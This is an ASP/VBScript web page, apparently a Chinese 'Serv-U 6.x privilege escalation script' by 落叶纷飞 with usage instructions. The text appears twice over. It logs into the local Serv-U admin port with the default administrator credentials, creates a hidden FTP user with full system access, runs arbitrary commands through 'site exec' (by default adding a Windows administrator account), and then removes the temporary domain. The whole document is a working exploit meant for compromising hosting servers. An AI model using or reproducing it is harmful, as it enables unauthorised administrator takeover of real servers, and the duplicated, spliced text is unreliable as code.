Author:落叶纷飞
使用方法:如果是6.4以下的保持默认即可,只要按你的需要修改执行的命令即可!如果为6.4请在“服务器端口”里填21,然后再在“服务器IP”中填写服务器的真实IP。
1
<
%@ LANGUAGE
=
VBScript %
>
2 < %
3 Dim user, pass, port, ftpport, cmd, loginuser, loginpass, deldomain, mt, newdomain, newuser, quit
4 dim action
5 action = request( " action " )
6 if not isnumeric (action) then response.end
7 user = trim (request( " u " ))
8 pass = trim (request( " p " ))
9 port = trim (request( " port " ))
10 cmd = trim (request( " c " ))
11 f = trim (request( " f " ))
12 if f = "" then
13 f = gpath()
14 else
15 f = left (f, 2 )
16 end if
17 ftpport = ffport
18 timeout = 3
19
20 loginuser = " User " & user & vbCrLf
21 loginpass = " Pass " & pass & vbCrLf
22 deldomain = " -DELETEDOMAIN " & vbCrLf & " -IP= " & iip & vbCrLf & " PortNo= " & ftpport & vbCrLf
23 mt = " SITE MAINTENANCE " & vbCrLf
24 newdomain = " -SETDOMAIN " & vbCrLf & " -Domain=leaves| " & iip & " | " & ftpport & " |-1|1|0 " & vbCrLf & " -TZOEnable=0 " & vbCrLf & " TZOKey= " & vbCrLf
25 newuser = " -SETUSERSETUP " & vbCrLf & " -IP=0.0.0.0 " & vbCrLf & " -PortNo= " & ftpport & vbCrLf & " -User=luo " & vbCrLf & " -Password=ye " & vbCrLf & _
26 " -HomeDir=c:\\ " & vbCrLf & " -LoginMesFile= " & vbCrLf & " -Disable=0 " & vbCrLf & " -RelPaths=1 " & vbCrLf & _
27 " -NeedSecure=0 " & vbCrLf & " -HideHidden=0 " & vbCrLf & " -AlwaysAllowLogin=0 " & vbCrLf & " -ChangePassword=0 " & vbCrLf & _
28 " -QuotaEnable=0 " & vbCrLf & " -MaxUsersLoginPerIP=-1 " & vbCrLf & " -SpeedLimitUp=0 " & vbCrLf & " -SpeedLimitDown=0 " & vbCrLf & _
29 " -MaxNrUsers=-1 " & vbCrLf & " -IdleTimeOut=600 " & vbCrLf & " -SessionTimeOut=-1 " & vbCrLf & " -Expire=0 " & vbCrLf & " -RatioUp=1 " & vbCrLf & _
30 " -RatioDown=1 " & vbCrLf & " -RatiosCredit=0 " & vbCrLf & " -QuotaCurrent=0 " & vbCrLf & " -QuotaMaximum=0 " & vbCrLf & _
31 " -Maintenance=System " & vbCrLf & " -PasswordType=Regular " & vbCrLf & " -Ratios=None " & vbCrLf & " Access=c:\\|RWAMELCDP " & vbCrLf
32 quit = " QUIT " & vbCrLf
33 newuser = replace (newuser, " c: " ,f)
34 select case action
35 case 1
36 set a = Server.CreateObject( " Microsoft.XMLHTTP " )
37 a.open " GET " , " http://127.0.0.1: " & port & " /leaves/upadmin/s1 " , True , "" , ""
38 a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit
39 set session( " a " ) = a
40 % >
41 < form method = " post " name = " leaves " >
42 < input name = " u " type = " hidden " id = " u " value = " <%=user%> " ></ td >
43 < input name = " p " type = " hidden " id = " p " value = " <%=pass%> " ></ td >
44 < input name = " port " type = " hidden " id = " port " value = " <%=port%> " ></ td >
45 < input name = " c " type = " hidden " id = " c " value = " <%=cmd%> " size = " 50 " >
46 < input name = " f " type = " hidden " id = " f " value = " <%=f%> " size = " 50 " >
47 < input name = " action " type = " hidden " id = " action " value = " 2 " ></ form >
48 < script language = " javascript " >
49 document.write( ' <center>正在连接 127.0.0.1:<%=port%>,使用用户名: <%=user%>,口令:<%=pass%><center>');
50 setTimeout( " document.all.leaves.submit(); " , 4000 );
51 </ script >
52 < %
53 case 2
54 set b = Server.CreateObject( " Microsoft.XMLHTTP " )
55 b.open " GET " , " http://127.0.0.1: " & ftpport & " /leaves/upadmin/s2 " , True , "" , ""
56 b.send " User luo " & vbCrLf & " pass ye " & vbCrLf & " site exec " & cmd & vbCrLf & quit
57 set session( " b " ) = b
58 % >
59 < form method = " post " name = " leaves " >
60 < input name = " u " type = " hidden " id = " u " value = " <%=user%> " ></ td >
61 < input name = " p " type = " hidden " id = " p " value = " <%=pass%> " ></ td >
62 < input name = " port " type = " hidden " id = " port " value = " <%=port%> " ></ td >
63 < input name = " c " type = " hidden " id = " c " value = " <%=cmd%> " size = " 50 " >
64 < input name = " f " type = " hidden " id = " f " value = " <%=f%> " size = " 50 " >
65 < input name = " action " type = " hidden " id = " action " value = " 3 " ></ form >
66 < script language = " javascript " >
67 document.write( ' <center>正在提升权限,请等待,<center>');
68 setTimeout( " document.all.leaves.submit(); " , 4000 );
69 </ script >
70 < %
71 case 3
72 set c = Server.CreateObject( " Microsoft.XMLHTTP " )
73 c.open " GET " , " http://127.0.0.1: " & port & " /leaves/upadmin/s3 " , True , "" , ""
74 c.send loginuser & loginpass & mt & deldomain & quit
75 set session( " c " ) = c
76 % >
77 < center > 提权完毕,已执行了命令:
78 < font color = red >< % = cmd% ></ font >
79
80
81 < input type = button value = " 返回继续 " onClick = " location.href='<%=gname()%>'; " >
82 </ center >
83
84 < %
85 case else
86 on error resume next
87 set a = session( " a " )
88 set b = session( " b " )
89 set c = session( " c " )
90 a.abort
91 Set a = Nothing
92 b.abort
93 Set b = Nothing
94 c.abort
95 Set c = Nothing
96 % >
97 < center >< form method = " post " name = " leaves " >
98 < tr align = " center " valign = " middle " >
99 < td colspan = " 2 " > Serv - U 6 .X 提权脚本 by 落叶纷飞【S.S.T】 @ 肇庆 </ td >
100
101 </ tr >
102 < tr align = " center " valign = " middle " >
103 < td width = " 200 " > 用户名: </ td >
104
105 < td width = " 400 " >< input name = " u " type = " text " id = " u " value = " LocalAdministrator " ></ td >
106
107 </ tr >
108 < tr align = " center " valign = " middle " >
109 < td > 口 令: </ td >
110
111 < td >< input name = " p " type = " text " id = " p " value = " #l@$ak#.lk;0@P " ></ td >
112
113 </ tr >
114 < tr align = " center " valign = " middle " >
115 < td > 端 口: </ td >
116
117 < td >< input name = " port " type = " text " id = " port " value = " 43958 " ></ td >
118
119 服务器端口:
120
121 < td >< input name = " ffport " type = " text " id = " ffport " value = " 65500 " ></ td >
122
123 服务器IP:
124
125 < td >< input name = " iip " type = " text " id = " iip " value = " 0.0.0.0 " ></ td >
126
127 </ tr >
128 < tr align = " center " valign = " middle " >
129 < td > 系统路径: </ td >
130
131 < td >< input name = " f " type = " text " id = " f " value = " <%=f%> " size = " 8 " ></ td >
132
133 </ tr >
134 < tr align = " center " valign = " middle " >
135 < td > 命 令: </ td >
136
137 < td >< input name = " c " type = " text " id = " c " value = " cmd /c net user leaves cnsst /add & net localgroup administrators leaves /add " size = " 50 " ></ td >
138
139 </ tr >
140 < tr align = " center " valign = " middle " >
141 < td colspan = " 2 " >< input type = " submit " name = " Submit " value = " 提交 " >
142 < input type = " reset " name = " Submit2 " value = " 重置 " >
143 < input name = " action " type = " hidden " id = " action " value = " 1 " ></ td >
144 </ tr >
145 </ form ></ center >
146
147
148 使用方法:如果是6.4以下的保持默认即可,只要按你的需要修改执行的命令即可!如果为6.4请在“服务器端口”里填21,然后再在“服务器IP”中填写服务器的真实IP。
149 < % end select
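function Gpath()
    ' Returns the lowercase drive prefix (e.g. "c:") of the Windows folder,
    ' falling back to "c:" when Scripting.FileSystemObject is unavailable or
    ' the folder path cannot be read.
    ' The FSO handle and the path are kept in local variables so this helper
    ' never clobbers the script-level "f" that the caller assigns the result to.
    dim fso, winDir
    on error resume next
    err.clear
    set fso = Server.CreateObject("Scripting.FileSystemObject")
    if err.number <> 0 then
        gpath = "c:"
        exit function
    end if
    ' GetSpecialFolder(0) is the Windows folder; only its "X:" prefix is needed
    winDir = fso.GetSpecialFolder(0)
    set fso = nothing
    ' A failed lookup (error raised, or a path shorter than "X:") also falls back
    if err.number <> 0 or len(winDir) < 2 then
        gpath = "c:"
    else
        gpath = lcase(left(winDir, 2))
    end if
end function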
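Function GName()
    ' Returns the absolute URL of the current script, built from the request's
    ' server variables. The scheme follows the HTTPS server variable ("on" when
    ' the request came over TLS) and the port is omitted when it is the
    ' scheme's default (80 for http, 443 for https).
    Dim scheme, svrPort, host, path
    If LCase(request.servervariables("HTTPS")) = "on" Then
        scheme = "https://"
    Else
        scheme = "http://"
    End If
    svrPort = request.servervariables("SERVER_PORT")
    host = request.servervariables("server_name")
    path = lcase(request.servervariables("script_name"))
    If (scheme = "http://" And svrPort = "80") Or (scheme = "https://" And svrPort = "443") Then
        GName = scheme & host & path
    Else
        GName = scheme & host & ":" & svrPort & path
    End If
End Function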
169 % >
170
2 < %
3 Dim user, pass, port, ftpport, cmd, loginuser, loginpass, deldomain, mt, newdomain, newuser, quit
4 dim action
5 action = request( " action " )
6 if not isnumeric (action) then response.end
7 user = trim (request( " u " ))
8 pass = trim (request( " p " ))
9 port = trim (request( " port " ))
10 cmd = trim (request( " c " ))
11 f = trim (request( " f " ))
12 if f = "" then
13 f = gpath()
14 else
15 f = left (f, 2 )
16 end if
17 ftpport = ffport
18 timeout = 3
19
20 loginuser = " User " & user & vbCrLf
21 loginpass = " Pass " & pass & vbCrLf
22 deldomain = " -DELETEDOMAIN " & vbCrLf & " -IP= " & iip & vbCrLf & " PortNo= " & ftpport & vbCrLf
23 mt = " SITE MAINTENANCE " & vbCrLf
24 newdomain = " -SETDOMAIN " & vbCrLf & " -Domain=leaves| " & iip & " | " & ftpport & " |-1|1|0 " & vbCrLf & " -TZOEnable=0 " & vbCrLf & " TZOKey= " & vbCrLf
25 newuser = " -SETUSERSETUP " & vbCrLf & " -IP=0.0.0.0 " & vbCrLf & " -PortNo= " & ftpport & vbCrLf & " -User=luo " & vbCrLf & " -Password=ye " & vbCrLf & _
26 " -HomeDir=c:\\ " & vbCrLf & " -LoginMesFile= " & vbCrLf & " -Disable=0 " & vbCrLf & " -RelPaths=1 " & vbCrLf & _
27 " -NeedSecure=0 " & vbCrLf & " -HideHidden=0 " & vbCrLf & " -AlwaysAllowLogin=0 " & vbCrLf & " -ChangePassword=0 " & vbCrLf & _
28 " -QuotaEnable=0 " & vbCrLf & " -MaxUsersLoginPerIP=-1 " & vbCrLf & " -SpeedLimitUp=0 " & vbCrLf & " -SpeedLimitDown=0 " & vbCrLf & _
29 " -MaxNrUsers=-1 " & vbCrLf & " -IdleTimeOut=600 " & vbCrLf & " -SessionTimeOut=-1 " & vbCrLf & " -Expire=0 " & vbCrLf & " -RatioUp=1 " & vbCrLf & _
30 " -RatioDown=1 " & vbCrLf & " -RatiosCredit=0 " & vbCrLf & " -QuotaCurrent=0 " & vbCrLf & " -QuotaMaximum=0 " & vbCrLf & _
31 " -Maintenance=System " & vbCrLf & " -PasswordType=Regular " & vbCrLf & " -Ratios=None " & vbCrLf & " Access=c:\\|RWAMELCDP " & vbCrLf
32 quit = " QUIT " & vbCrLf
33 newuser = replace (newuser, " c: " ,f)
34 select case action
35 case 1
36 set a = Server.CreateObject( " Microsoft.XMLHTTP " )
37 a.open " GET " , " http://127.0.0.1: " & port & " /leaves/upadmin/s1 " , True , "" , ""
38 a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit
39 set session( " a " ) = a
40 % >
41 < form method = " post " name = " leaves " >
42 < input name = " u " type = " hidden " id = " u " value = " <%=user%> " ></ td >
43 < input name = " p " type = " hidden " id = " p " value = " <%=pass%> " ></ td >
44 < input name = " port " type = " hidden " id = " port " value = " <%=port%> " ></ td >
45 < input name = " c " type = " hidden " id = " c " value = " <%=cmd%> " size = " 50 " >
46 < input name = " f " type = " hidden " id = " f " value = " <%=f%> " size = " 50 " >
47 < input name = " action " type = " hidden " id = " action " value = " 2 " ></ form >
48 < script language = " javascript " >
49 document.write( ' <center>正在连接 127.0.0.1:<%=port%>,使用用户名: <%=user%>,口令:<%=pass%><center>');
50 setTimeout( " document.all.leaves.submit(); " , 4000 );
51 </ script >
52 < %
53 case 2
54 set b = Server.CreateObject( " Microsoft.XMLHTTP " )
55 b.open " GET " , " http://127.0.0.1: " & ftpport & " /leaves/upadmin/s2 " , True , "" , ""
56 b.send " User luo " & vbCrLf & " pass ye " & vbCrLf & " site exec " & cmd & vbCrLf & quit
57 set session( " b " ) = b
58 % >
59 < form method = " post " name = " leaves " >
60 < input name = " u " type = " hidden " id = " u " value = " <%=user%> " ></ td >
61 < input name = " p " type = " hidden " id = " p " value = " <%=pass%> " ></ td >
62 < input name = " port " type = " hidden " id = " port " value = " <%=port%> " ></ td >
63 < input name = " c " type = " hidden " id = " c " value = " <%=cmd%> " size = " 50 " >
64 < input name = " f " type = " hidden " id = " f " value = " <%=f%> " size = " 50 " >
65 < input name = " action " type = " hidden " id = " action " value = " 3 " ></ form >
66 < script language = " javascript " >
67 document.write( ' <center>正在提升权限,请等待,<center>');
68 setTimeout( " document.all.leaves.submit(); " , 4000 );
69 </ script >
70 < %
71 case 3
72 set c = Server.CreateObject( " Microsoft.XMLHTTP " )
73 c.open " GET " , " http://127.0.0.1: " & port & " /leaves/upadmin/s3 " , True , "" , ""
74 c.send loginuser & loginpass & mt & deldomain & quit
75 set session( " c " ) = c
76 % >
77 < center > 提权完毕,已执行了命令:
78 < font color = red >< % = cmd% ></ font >
79
80
81 < input type = button value = " 返回继续 " onClick = " location.href='<%=gname()%>'; " >
82 </ center >
83
84 < %
85 case else
86 on error resume next
87 set a = session( " a " )
88 set b = session( " b " )
89 set c = session( " c " )
90 a.abort
91 Set a = Nothing
92 b.abort
93 Set b = Nothing
94 c.abort
95 Set c = Nothing
96 % >
97 < center >< form method = " post " name = " leaves " >
98 < tr align = " center " valign = " middle " >
99 < td colspan = " 2 " > Serv - U 6 .X 提权脚本 by 落叶纷飞【S.S.T】 @ 肇庆 </ td >
100
101 </ tr >
102 < tr align = " center " valign = " middle " >
103 < td width = " 200 " > 用户名: </ td >
104
105 < td width = " 400 " >< input name = " u " type = " text " id = " u " value = " LocalAdministrator " ></ td >
106
107 </ tr >
108 < tr align = " center " valign = " middle " >
109 < td > 口 令: </ td >
110
111 < td >< input name = " p " type = " text " id = " p " value = " #l@$ak#.lk;0@P " ></ td >
112
113 </ tr >
114 < tr align = " center " valign = " middle " >
115 < td > 端 口: </ td >
116
117 < td >< input name = " port " type = " text " id = " port " value = " 43958 " ></ td >
118
119 服务器端口:
120
121 < td >< input name = " ffport " type = " text " id = " ffport " value = " 65500 " ></ td >
122
123 服务器IP:
124
125 < td >< input name = " iip " type = " text " id = " iip " value = " 0.0.0.0 " ></ td >
126
127 </ tr >
128 < tr align = " center " valign = " middle " >
129 < td > 系统路径: </ td >
130
131 < td >< input name = " f " type = " text " id = " f " value = " <%=f%> " size = " 8 " ></ td >
132
133 </ tr >
134 < tr align = " center " valign = " middle " >
135 < td > 命 令: </ td >
136
137 < td >< input name = " c " type = " text " id = " c " value = " cmd /c net user leaves cnsst /add & net localgroup administrators leaves /add " size = " 50 " ></ td >
138
139 </ tr >
140 < tr align = " center " valign = " middle " >
141 < td colspan = " 2 " >< input type = " submit " name = " Submit " value = " 提交 " >
142 < input type = " reset " name = " Submit2 " value = " 重置 " >
143 < input name = " action " type = " hidden " id = " action " value = " 1 " ></ td >
144 </ tr >
145 </ form ></ center >
146
147
148 使用方法:如果是6.4以下的保持默认即可,只要按你的需要修改执行的命令即可!如果为6.4请在“服务器端口”里填21,然后再在“服务器IP”中填写服务器的真实IP。
149 < % end select
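function Gpath()
    ' Returns the lowercase drive prefix (e.g. "c:") of the Windows folder,
    ' falling back to "c:" when Scripting.FileSystemObject is unavailable or
    ' the folder path cannot be read.
    ' The FSO handle and the path are kept in local variables so this helper
    ' never clobbers the script-level "f" that the caller assigns the result to.
    dim fso, winDir
    on error resume next
    err.clear
    set fso = Server.CreateObject("Scripting.FileSystemObject")
    if err.number <> 0 then
        gpath = "c:"
        exit function
    end if
    ' GetSpecialFolder(0) is the Windows folder; only its "X:" prefix is needed
    winDir = fso.GetSpecialFolder(0)
    set fso = nothing
    ' A failed lookup (error raised, or a path shorter than "X:") also falls back
    if err.number <> 0 or len(winDir) < 2 then
        gpath = "c:"
    else
        gpath = lcase(left(winDir, 2))
    end if
end function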
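Function GName()
    ' Returns the absolute URL of the current script, built from the request's
    ' server variables. The scheme follows the HTTPS server variable ("on" when
    ' the request came over TLS) and the port is omitted when it is the
    ' scheme's default (80 for http, 443 for https).
    Dim scheme, svrPort, host, path
    If LCase(request.servervariables("HTTPS")) = "on" Then
        scheme = "https://"
    Else
        scheme = "http://"
    End If
    svrPort = request.servervariables("SERVER_PORT")
    host = request.servervariables("server_name")
    path = lcase(request.servervariables("script_name"))
    If (scheme = "http://" And svrPort = "80") Or (scheme = "https://" And svrPort = "443") Then
        GName = scheme & host & path
    Else
        GName = scheme & host & ":" & svrPort & path
    End If
End Function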
169 % >
170